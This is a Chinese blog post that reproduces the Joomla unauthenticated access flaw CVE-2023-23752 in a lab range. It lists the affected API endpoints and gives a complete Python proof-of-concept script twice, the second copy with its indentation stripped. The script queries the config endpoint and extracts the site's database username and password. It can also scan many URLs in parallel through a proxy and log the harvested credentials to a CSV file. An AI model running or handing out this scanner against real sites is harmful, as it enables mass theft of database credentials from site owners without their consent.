Joomla未授权访问漏洞(CVE-2023-23752)靶场复现

靶场界面

复现成功

flag

其他影响API如下
v1/banners
v1/banners/:id
v1/banners
v1/banners/:id
v1/banners/:id
v1/banners/clients
v1/banners/clients/:id
v1/banners/clients
v1/banners/clients/:id
v1/banners/clients/:id
v1/banners/categories
v1/banners/categories/:id
v1/banners/categories
v1/banners/categories/:id
v1/banners/categories/:id
v1/banners/:id/contenthistory
v1/banners/:id/contenthistory/keep
v1/banners/:id/contenthistory
v1/config/application
v1/config/application
v1/config/:component_name
v1/config/:component_name
v1/contacts/form/:id
v1/contacts
v1/contacts/:id
v1/contacts
v1/contacts/:id
v1/contacts/:id
v1/contacts/categories
v1/contacts/categories/:id
v1/contacts/categories
v1/contacts/categories/:id
v1/contacts/categories/:id
v1/fields/contacts/contact
v1/fields/contacts/contact/:id
v1/fields/contacts/contact
v1/fields/contacts/contact/:id
v1/fields/contacts/contact/:id
v1/fields/contacts/mail
v1/fields/contacts/mail/:id
v1/fields/contacts/mail
v1/fields/contacts/mail/:id
v1/fields/contacts/mail/:id
v1/fields/contacts/categories
v1/fields/contacts/categories/:id
v1/fields/contacts/categories
v1/fields/contacts/categories/:id
v1/fields/contacts/categories/:id
v1/fields/groups/contacts/contact
v1/fields/groups/contacts/contact/:id
v1/fields/groups/contacts/contact
v1/fields/groups/contacts/contact/:id
v1/fields/groups/contacts/contact/:id
v1/fields/groups/contacts/mail
v1/fields/groups/contacts/mail/:id
v1/fields/groups/contacts/mail
v1/fields/groups/contacts/mail/:id
v1/fields/groups/contacts/mail/:id
v1/fields/groups/contacts/categories
v1/fields/groups/contacts/categories/:id
v1/fields/groups/contacts/categories
v1/fields/groups/contacts/categories/:id
v1/fields/groups/contacts/categories/:id
v1/contacts/:id/contenthistory
v1/contacts/:id/contenthistory/keep
v1/contacts/:id/contenthistory
v1/content/articles
v1/content/articles/:id
v1/content/articles
v1/content/articles/:id
v1/content/articles/:id
v1/content/categories
v1/content/categories/:id
v1/content/categories
v1/content/categories/:id
v1/content/categories/:id
v1/fields/content/articles
v1/fields/content/articles/:id
v1/fields/content/articles
v1/fields/content/articles/:id
v1/fields/content/articles/:id
v1/fields/content/categories
v1/fields/content/categories/:id
v1/fields/content/categories
v1/fields/content/categories/:id
v1/fields/content/categories/:id
v1/fields/groups/content/articles
v1/fields/groups/content/articles/:id
v1/fields/groups/content/articles
v1/fields/groups/content/articles/:id
v1/fields/groups/content/articles/:id
v1/fields/groups/content/categories
v1/fields/groups/content/categories/:id
v1/fields/groups/content/categories
v1/fields/groups/content/categories/:id
v1/fields/groups/content/categories/:id
v1/content/articles/:id/contenthistory
v1/content/articles/:id/contenthistory/keep
v1/content/articles/:id/contenthistory
v1/extensions
v1/languages/content
v1/languages/content/:id
v1/languages/content
v1/languages/content/:id
v1/languages/content/:id
v1/languages/overrides/search
v1/languages/overrides/search/cache/refresh
v1/languages/overrides/site/zh-CN
v1/languages/overrides/site/zh-CN/:id
v1/languages/overrides/site/zh-CN
v1/languages/overrides/site/zh-CN/:id
v1/languages/overrides/site/zh-CN/:id
v1/languages/overrides/administrator/zh-CN
v1/languages/overrides/administrator/zh-CN/:id
v1/languages/overrides/administrator/zh-CN
v1/languages/overrides/administrator/zh-CN/:id
v1/languages/overrides/administrator/zh-CN/:id
v1/languages/overrides/site/en-GB
v1/languages/overrides/site/en-GB/:id
v1/languages/overrides/site/en-GB
v1/languages/overrides/site/en-GB/:id
v1/languages/overrides/site/en-GB/:id
v1/languages/overrides/administrator/en-GB
v1/languages/overrides/administrator/en-GB/:id
v1/languages/overrides/administrator/en-GB
v1/languages/overrides/administrator/en-GB/:id
v1/languages/overrides/administrator/en-GB/:id
v1/languages
v1/languages
v1/media/adapters
v1/media/adapters/:id
v1/media/files
v1/media/files/:path/
v1/media/files/:path
v1/media/files
v1/media/files/:path
v1/media/files/:path
v1/menus/site
v1/menus/site/:id
v1/menus/site
v1/menus/site/:id
v1/menus/site/:id
v1/menus/administrator
v1/menus/administrator/:id
v1/menus/administrator
v1/menus/administrator/:id
v1/menus/administrator/:id
v1/menus/site/items
v1/menus/site/items/:id
v1/menus/site/items
v1/menus/site/items/:id
v1/menus/site/items/:id
v1/menus/administrator/items
v1/menus/administrator/items/:id
v1/menus/administrator/items
v1/menus/administrator/items/:id
v1/menus/administrator/items/:id
v1/menus/site/items/types
v1/menus/administrator/items/types
v1/messages
v1/messages/:id
v1/messages
v1/messages/:id
v1/messages/:id
v1/modules/types/site
v1/modules/types/administrator
v1/modules/site
v1/modules/site/:id
v1/modules/site
v1/modules/site/:id
v1/modules/site/:id
v1/modules/administrator
v1/modules/administrator/:id
v1/modules/administrator
v1/modules/administrator/:id
v1/modules/administrator/:id
v1/newsfeeds/feeds
v1/newsfeeds/feeds/:id
v1/newsfeeds/feeds
v1/newsfeeds/feeds/:id
v1/newsfeeds/feeds/:id
v1/newsfeeds/categories
v1/newsfeeds/categories/:id
v1/newsfeeds/categories
v1/newsfeeds/categories/:id
v1/newsfeeds/categories/:id
v1/plugins
v1/plugins/:id
v1/plugins/:id
v1/privacy/requests
v1/privacy/requests/:id
v1/privacy/requests/export/:id
v1/privacy/requests
v1/privacy/consents
v1/privacy/consents/:id
v1/privacy/consents/:id
v1/redirects
v1/redirects/:id
v1/redirects
v1/redirects/:id
v1/redirects/:id
v1/tags
v1/tags/:id
v1/tags
v1/tags/:id
v1/tags/:id
v1/templates/styles/site
v1/templates/styles/site/:id
v1/templates/styles/site
v1/templates/styles/site/:id
v1/templates/styles/site/:id
v1/templates/styles/administrator
v1/templates/styles/administrator/:id
v1/templates/styles/administrator
v1/templates/styles/administrator/:id
v1/templates/styles/administrator/:id
v1/users
v1/users/:id
v1/users
v1/users/:id
v1/users/:id
v1/fields/users
v1/fields/users/:id
v1/fields/users
v1/fields/users/:id
v1/fields/users/:id
v1/fields/groups/users
v1/fields/groups/users/:id
v1/fields/groups/users
v1/fields/groups/users/:id
v1/fields/groups/users/:id
v1/users/groups
v1/users/groups/:id
v1/users/groups
v1/users/groups/:id
v1/users/groups/:id
v1/users/levels
v1/users/levels/:id
v1/users/levels
v1/users/levels/:id
v1/users/levels/:id

验证脚本(POC):

点击查看代码

 # -*- coding: utf-8 -*-
import requests
import argparse
import threading
import sys
import re
import time
def cmd_line():
    parse = argparse.ArgumentParser(
        description="Joomla 未授权访问漏洞 CVE-2023-23752",
        usage='''
        python CVE-2023-23752.py -u url
        python CVE-2023-23752.py -f file.txt
        python CVE-2023-23752.py -f file.txt -o out_file.csv
        python CVE-2023-23752.py -f file.txt -p socks5://127.0.0.1:8080  
        ''', add_help=True)
    parse.add_argument('-u', '--url', help="指定url地址")
    parse.add_argument('-f', '--file', help="指定文件")
    parse.add_argument('-p', '--proxy', help="设置代理，如socks5://127.0.0.1:8080 [clash]")
    parse.add_argument('-o', '--output', help="将结果输出到文件", default=str(time.time()) + ".csv")
    if len(sys.argv) == 1:
        sys.argv.append('-h')
    return parse.parse_args()
def poc(url, proxy_server, output_file):
    try:
        if url[-1:] == '/':
            url = str(url).strip('/')
        payload = "{}/api/index.php/v1/config/application?public=true".format(url)
        header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"}
        response = requests.get(url=payload, proxies={"http": proxy_server, "https": proxy_server}, headers=header)
        html = response.text
        if "password" in html:
            print("[+] 漏洞存在！[✅]url: {}".format(url))
            pattern = re.compile(r'\{"user":"(.*?)","id":')
            username = pattern.findall(html)[0]
            print('用户名: ' + username)
            pattern = re.compile(r'\{"password":"(.*?)","id":')
            password = pattern.findall(html)[0]
            print('密码: ' + password)
            if output_file:
                with open(output_file, 'a', encoding='utf-8') as f:
                    f.write('{0},{1},{2},{3}\n'.format(url, payload, username, password))
        else:
            print("[x] 未检测到漏洞！[x] url: {}".format(url))
    except:
        print("[!] URL连接失败！[!] url: {}".format(url))
def file(url, file, proxy_server, output_file):
    with open(file, 'r', encoding='utf-8') as f:
        urls = f.readlines()
    threads = []
    for url in urls:
        t = threading.Thread(target=poc, args=(url.strip(), proxy_server, output_file))
        threads.append(t)
        t.start()
if __name__ == "__main__":
    args = cmd_line()
    if args.file:
        file(args.url, args.file, args.proxy, args.output)
    else:
        poc(args.url, args.proxy, args.output)

参考：
Joomla未授权访问漏洞(CVE-2023-23752)-阿里云开发者社区

posted on 2024-08-05 16:41 爱在西元间阅读(30) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· Jorani远程命令执行漏洞 CVE-2023-26469靶场复现

· cockpit <=2.4.1 后台任意文件上传漏洞靶场复现（CVE-2023-1313）

· Joomla未授权访问漏洞(CVE-2023-23752)

· Joomla未授权访问漏洞|CVE-2023-23752复现及修复

· joomla 代码执行 (CVE-2020-10238)

阅读排行：
· 阿里最新开源QwQ-32B，效果媲美deepseek-r1满血版，部署成本又又又降低了！
· SQL Server 2025 AI相关能力初探
· 单线程的Redis速度为什么快？
· AI编程工具终极对决：字节Trae VS Cursor，谁才是开发者新宠？
· 开源Multi-agent AI智能体框架aevatar.ai，欢迎大家贡献代码

历史上的今天：
2020-08-05 Linux top命令用法（未完）
2020-08-05 Windows家庭版安装docker（添加Hyper-V组件、修改版本）
2020-08-05 关于Python 3.x中，使用print函数时出现的语法错误（SyntaxError: invalid syntax）的问题的原因以及python2.x和3.x差别
2020-08-05 pip install urllib2不能安装
2020-08-05 python3安装poster库时报错解决：ERROR: Command errored out with exit status 1: python setup.py egg_info Check the logs for full command output.

路漫漫其修远兮，吾将上下而求索

导航

公告

统计

搜索

常用链接

我的标签

随笔分类

随笔档案

阅读排行榜

评论排行榜

推荐排行榜

最新评论

Joomla未授权访问漏洞(CVE-2023-23752)靶场复现

	# -- coding: utf-8 --
	import requests
	import argparse
	import threading
	import sys
	import re
	import time
	def cmd_line():
	parse = argparse.ArgumentParser(
	description="Joomla 未授权访问漏洞 CVE-2023-23752",
	usage='''
	python CVE-2023-23752.py -u url
	python CVE-2023-23752.py -f file.txt
	python CVE-2023-23752.py -f file.txt -o out_file.csv
	python CVE-2023-23752.py -f file.txt -p socks5://127.0.0.1:8080
	''', add_help=True)
	parse.add_argument('-u', '--url', help="指定url地址")
	parse.add_argument('-f', '--file', help="指定文件")
	parse.add_argument('-p', '--proxy', help="设置代理，如socks5://127.0.0.1:8080 [clash]")
	parse.add_argument('-o', '--output', help="将结果输出到文件", default=str(time.time()) + ".csv")
	if len(sys.argv) == 1:
	sys.argv.append('-h')
	return parse.parse_args()
	def poc(url, proxy_server, output_file):
	try:
	if url[-1:] == '/':
	url = str(url).strip('/')
	payload = "{}/api/index.php/v1/config/application?public=true".format(url)
	header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"}
	response = requests.get(url=payload, proxies={"http": proxy_server, "https": proxy_server}, headers=header)
	html = response.text
	if "password" in html:
	print("[+] 漏洞存在！[✅]url: {}".format(url))
	pattern = re.compile(r'\{"user":"(.*?)","id":')
	username = pattern.findall(html)[0]
	print('用户名: ' + username)
	pattern = re.compile(r'\{"password":"(.*?)","id":')
	password = pattern.findall(html)[0]
	print('密码: ' + password)
	if output_file:
	with open(output_file, 'a', encoding='utf-8') as f:
	f.write('{0},{1},{2},{3}\n'.format(url, payload, username, password))
	else:
	print("[x] 未检测到漏洞！[x] url: {}".format(url))
	except:
	print("[!] URL连接失败！[!] url: {}".format(url))
	def file(url, file, proxy_server, output_file):
	with open(file, 'r', encoding='utf-8') as f:
	urls = f.readlines()
	threads = []
	for url in urls:
	t = threading.Thread(target=poc, args=(url.strip(), proxy_server, output_file))
	threads.append(t)
	t.start()
	if __name__ == "__main__":
	args = cmd_line()
	if args.file:
	file(args.url, args.file, args.proxy, args.output)
	else:
	poc(args.url, args.proxy, args.output)